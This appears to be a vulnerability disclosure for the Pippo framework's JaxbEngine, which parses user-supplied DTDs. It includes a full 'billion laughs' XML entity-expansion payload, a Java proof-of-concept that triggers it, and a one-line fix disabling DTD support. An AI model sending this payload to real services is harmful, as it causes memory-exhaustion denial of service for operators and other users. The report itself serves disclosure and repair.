groupId: ro.pippoartifactId:pippo-jaxbversion: 1.12.0
> Pippo unsafely parses user provided XML. The fromString()
in the ro.pippo.jaxb.JaxbEngine
class allows user provided DTDs that the rest of the XML may reference. This can lead to recursive entity expansion and a subsequent billion laughs attack.
Source File and Line Number: https://github.com/pippo-java/pippo/blob/7da9f4db945d10113cf4ea4ed44ba0f1a7f83a8f/pippo-content-type-parent/pippo-jaxb/src/main/java/ro/pippo/jaxb/JaxbEngine.java#L78
> Detailed steps to reproduce with all required references/steps/commands. Any sample/exploit code or other proof of concept.
<?xml version="1.0"?>
<!DOCTYPE PERSON [
<!ENTITY PERSON "PERSON">
<!ELEMENT PERSON (#PCDATA)>
<!ENTITY PERSON1 "&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;&PERSON;">
<!ENTITY PERSON2 "&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;&PERSON1;">
<!ENTITY PERSON3 "&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;&PERSON2;">
<!ENTITY PERSON4 "&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;&PERSON3;">
<!ENTITY PERSON5 "&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;&PERSON4;">
<!ENTITY PERSON6 "&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;&PERSON5;">
<!ENTITY PERSON7 "&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;&PERSON6;">
<!ENTITY PERSON8 "&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;&PERSON7;">
<!ENTITY PERSON9 "&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;&PERSON8;">
]>
<PERSON>&PERSON9;</PERSON>
import org.apache.commons.io.IOUtil;
import ro.pippo.jaxb.JaxbEngine;
import java.io.IOException;
public class JaxBEnginePoC {
public static void main(String[] args) throws IOException {
String resourceName = args[0];
String payload = IOUtil.toString(
JaxBEnginePoC.class.getResourceAsStream(resourceName),
"UTF-8"
);
JaxbEngine jaxbEngine = new JaxbEngine();
Object myObj = jaxbEngine.fromString(payload, Person.class);
System.out.println("Completed!");
}
}
> If you’re able to provide a patch with the fix, please post it in this section (or attach)
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, true);
Should Be
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
> State all technical information about the stack where the vulnerability was found
> Select Y or N for the following statements:
> Finder’s comments and funny memes goes here
http://i.imgur.com/3POtveC.jpg
Is it pronounced imgur or imgur? Gif or Gif?
It causes a DoS. Specifically: Entities are created recursively and large amounts of heap memory is taken. Eventually, the JVM process will run out of memory. Otherwise, if the OS does not bound the memory on that process, memory will continue to be exhausted and will affect other processes on the system.